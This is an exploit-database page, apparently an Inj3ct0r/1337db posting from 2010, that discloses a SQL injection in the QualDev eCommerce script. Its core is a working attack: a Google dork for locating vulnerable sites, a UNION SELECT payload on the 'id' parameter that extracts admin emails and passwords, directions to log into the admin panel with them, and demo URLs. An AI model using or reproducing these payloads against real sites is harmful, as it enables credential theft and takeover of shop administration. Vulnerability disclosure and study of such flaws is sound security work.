Home / os / win7

[webapps / 0day] - QualDev eCommerce script SQL Injection Vu

Posted on 16 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>QualDev eCommerce script SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='QualDev eCommerce script SQL Injection Vulnerability by ErrNick in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>==================================================== QualDev eCommerce script SQL Injection Vulnerability ==================================================== # Exploit Title: QualDev eCommerce script SQL injection vulnerability # Vendor: http://www.qualdev.com # Date: 15.12.2010 # Version: all version # Category:: webapps # Google dork: inurl:&quot;index.php?file=allfile&quot; # Tested on: FreeBSD 7.1 # Author: ErrNick # Site: XakNet.ru, forum.xaknet.ru # Contact: errnick[at]xaknet[dot]ru # Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER, Kronus, mst &amp;&amp; others) # Intro: - A parameter is not properly sanitised before being used in a SQL query. - Input passed to &quot;id&quot; parameter is not properly - sanitised before being used in a SQL query. This can be - exploited to manipulate SQL queries by injecting - arbitrary SQL code. # Exploit: index.php?file=allfile&amp;id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin logining with admin email &amp;&amp; password there http://victim/adminpanel/ #Demo: - http://www.site.com/index.php?file=allfile&amp;id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin - http://www.site.com/index.php?file=allfile&amp;id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin - http://www.site.com/index.php?file=allfile&amp;id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin Vizit us at http://xaknet.ru # <a href='http://1337db.com/'>1337db.com</a> [2010-12-16]</pre></body></html>

 

TOP